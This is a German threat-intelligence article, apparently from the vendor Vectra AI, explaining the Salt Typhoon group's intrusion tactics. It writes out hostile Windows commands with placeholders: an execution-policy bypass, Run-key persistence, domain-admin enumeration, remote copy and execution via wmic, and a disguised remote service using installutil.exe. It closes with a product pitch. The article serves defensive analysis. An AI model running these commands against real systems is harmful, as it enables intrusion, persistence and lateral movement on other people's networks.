Salt Typhoon folgt einer strukturierten Angriffssequenz und verwendet integrierte Windows-Tools, um nicht entdeckt zu werden. Im Folgenden finden Sie eine Aufschlüsselung ihrer Taktik und der verwendeten Befehle.
Salt Typhoon nutzt in erster Linie öffentlich zugängliche Server mit bekannten Schwachstellen aus. Anstatt sich auf phishing zu verlassen, bevorzugen sie N-Day- und zero-day , um Remote Code Execution (RCE) zu erreichen.
Sobald sie sich Zugang verschafft haben, führen sie bösartige Nutzdaten aus und sorgen mit Windows-Tools für die Persistenz.
Sie verwenden PowerShell, um Skripte ohne Einschränkungen auszuführen:
powershell -ex bypass -c "<password>"
-Ex-Bypass
: Setzt die Ausführungsrichtlinie außer Kraft, damit das Skript ausgeführt werden kann.<password>
: Schlüssel zur Entschlüsselung des Skripts, das normalerweise verschlüsselt ist.Um sicherzustellen, dass die malware jedes Mal ausgeführt wird, wenn sich ein Benutzer anmeldet, fügen sie einen Registrierungsschlüssel hinzu:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
: Speicherort in der Registrierung für Autostart-Programme.REG_SZ
: Gibt einen String-Wert (den malware ) an./f
: Erzwingt die Ausführung ohne Bestätigung.Salt Typhoon sammelt Informationen über die Umgebung, bevor es zu einer Eskalation der Berechtigungen kommt.
wmic process get name,processid,commandline
Netzgruppe
zur Identifizierung von Domänenadministratorencmd /c "net group 'domain admins' /domain"
/Domäne
: Stellt sicher, dass die Abfrage für die Active Directory-Domäne gilt und nicht nur für den lokalen Rechner.Nach der Erkundung erweitern sie ihre Privilegien und stehlen Anmeldedaten.
Sie installieren Werkzeuge wie:
Sie setzen ein Cobalt Strike, ein legitimes Red-Teaming-Tool, um SYSTEM-Rechte zu erlangen und tiefer in das Netzwerk einzudringen.
Salt Typhoon verbreitet sich über das Netzwerk mithilfe verschiedener Windows-Dienstprogramme.
copy \\<target_ip>\C$\Windows\Temp\malware.bat
\\<target_ip>
um einen gemeinsamen Ordner auf einem anderen Rechner anzugeben..bat
), die aus der Ferne ausgeführt werden sollen.wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"
/node:<target_ip>
: Legt die Zielmaschine.Prozessaufruf erstellen
: Führt einen Prozess aus der Ferne aus.cmd /c
: Führt die kopierte Batch-Datei aus.sc erstellen
)sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own
sc
: Dienstprogramm zur Steuerung von Windows-Diensten.\\<target_ip>
: Erzeugt den Dienst per Fernzugriff auf einem anderen Rechner.VGAuthtools
: Tarnt malware als legitimes Tool.binpath
: Verwendet installutil.exe
(a legitimes Windows-Werkzeug) zur Ausführung der bösartige Nutzlast.start= auto
: Sorgt für Persistenz, indem die malware bei jedem Neustart des Rechners neu gestartet wird.Salt Typhoon baut eine ständige Kommunikation mit seinen C2-Servern auf.
Salt Typhoon vermeidet eine Entdeckung, indem er vertrauenswürdige Plattformen nutzt, um gestohlene Daten hochzuladen:
Salt Typhoon überwacht kontinuierlich kompromittierte Netzwerke und stiehlt sensible Daten über einen längeren Zeitraum.
----
Die Plattform von Vectra AIkonzentriert sich auf reale Angriffsverhaltensweisen, nicht nur auf bekannte Bedrohungen. So kann sie Salt Typhoon Aktivitäten auch dann erkennen, wenn Angreifer integrierte Windows-Tools verwenden.
Erfahren Sie mehr über unsere KI-gesteuerten Erkennungen oder probieren Sie unsere selbstgeführte Demo aus.